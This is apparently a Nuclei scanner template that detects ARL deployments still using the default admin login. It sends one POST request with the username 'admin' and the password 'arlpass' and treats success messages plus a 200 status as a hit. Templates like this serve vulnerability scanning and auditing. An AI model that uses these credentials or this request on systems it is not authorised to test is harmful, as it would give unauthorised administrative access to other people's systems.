id: arl-default-login

info:
  name: ARL Default Admin Login
  author: pikpikcu
  severity: high
  description: An ARL default admin login was discovered.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: arl,default-login

http:
  - raw:
      - |
        POST /api/user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=UTF-8

        {"username":"{{username}}","password":"{{password}}"}

    payloads:
      username:
        - admin
      password:
        - arlpass
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        condition: and
        words:
          - '"message": "success"'
          - '"username": "admin"'
          - '"type": "login"'

      - type: status
        status:
          - 200
# digest: 490a0046304402203b3461f5fb3ab8e76005bc112395b98f75dd91556ca906bab3631231cfec408e022027da40927757d8a5f0d089f80e7e7efea6b5486e579ecefb7342a25c77380564:922c64590222798bb761d5b6d8e72950